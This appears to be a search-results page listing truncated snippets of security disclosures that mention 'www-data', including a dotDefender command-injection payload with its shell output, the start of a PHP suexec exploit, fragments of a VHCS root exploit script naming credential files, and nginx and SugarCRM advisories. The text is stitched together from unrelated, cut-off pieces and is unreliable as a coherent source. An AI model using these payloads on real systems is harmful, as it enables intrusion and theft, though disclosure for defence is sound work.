
www/data

Remote Command Execution in dotDefender Site Management

../;pwd;&action=deletesite&linenum=15

--------------------/Response/--------------------
[...]
<br>
uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 12
drwxr-xr-x 3 root     root 4096 Nov 23 02:37 .
drwxr-xr-x 9 root     root 4096 Nov 23 02:37 ..
drwxr-xr-x 7 www-data   99 4096 Nov 23 07:11 admin
/usr/local/APPCure-full/lib/admin

Re: [Full-disclosure] Remote Command Execution in dotDefender Site Management

> ../;pwd;&action=deletesite&linenum=15
> 
> --------------------/Response/--------------------
> [...]
> <br>
> uid=33(www-data) gid=33(www-data) groups=33(www-data)
> total 12
> drwxr-xr-x 3 root     root 4096 Nov 23 02:37 .
> drwxr-xr-x 9 root     root 4096 Nov 23 02:37 ..
> drwxr-xr-x 7 www-data   99 4096 Nov 23 07:11 admin
> /usr/local/APPCure-full/lib/admin

Local vulnerability in suexec + FastCGI + PHP configurations

In .htaccess we have:
Action php-fcgi /php.fcgi
AddHandler php-fcgi .php

This is a fairly common setup. It can be exploited as follows (www-data is the username the webserver runs as):

$ whoami
www-data
$ cat >/tmp/exploit.php
<?php system("whoami");

VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit

        var $sleep_time = 4;

        #  -rw-r--r-- 1 root root
        var $conf_path = '/etc/vhcs2/vhcs2.conf';

        # -r-------- 1 www-data www-data
        var $keys_path = '/var/www/vhcs2/gui/include/vhcs2-db-keys.php';

        var $head_arr = array(
            'admin/index.php'       => 3,
            'reseller/index.php'    => 2,

[SECURITY] [DSA 1884-1] New nginx packages fix arbitrary code execution

CVE ID         : CVE-2009-2629

Chris Ries discovered that nginx, a high-performance HTTP server, reverse
proxy and IMAP/POP3 proxy server, is vulnerable to a buffer underflow when
processing certain HTTP requests.  An attacker can use this to execute
arbitrary code with the rights of the worker process (www-data on Debian)
or possibly perform denial of service attacks by repeatedly crashing
worker processes via a specially crafted URL in an HTTP request.
For the oldstable distribution (etch), this problem has been fixed in

SugarCRM Community Edition Local File Disclosure Vulnerability

As a result SugarCRM does not display the new RSS feed in the list as it is not a valid RSS URL Feed. However, the application creates a local file with the filename of the md5 hash of the URL entered. The file is created in the directory cache/feeds. If the Apache web server is used, the file is created with the user www-data containing read permission.


== Exploitation ==

An exploitation example in a LAMP (Linux, Apache, MySQL, PHP) 



Copyright © 1995-2012 LinuxRocket.net. All rights reserved.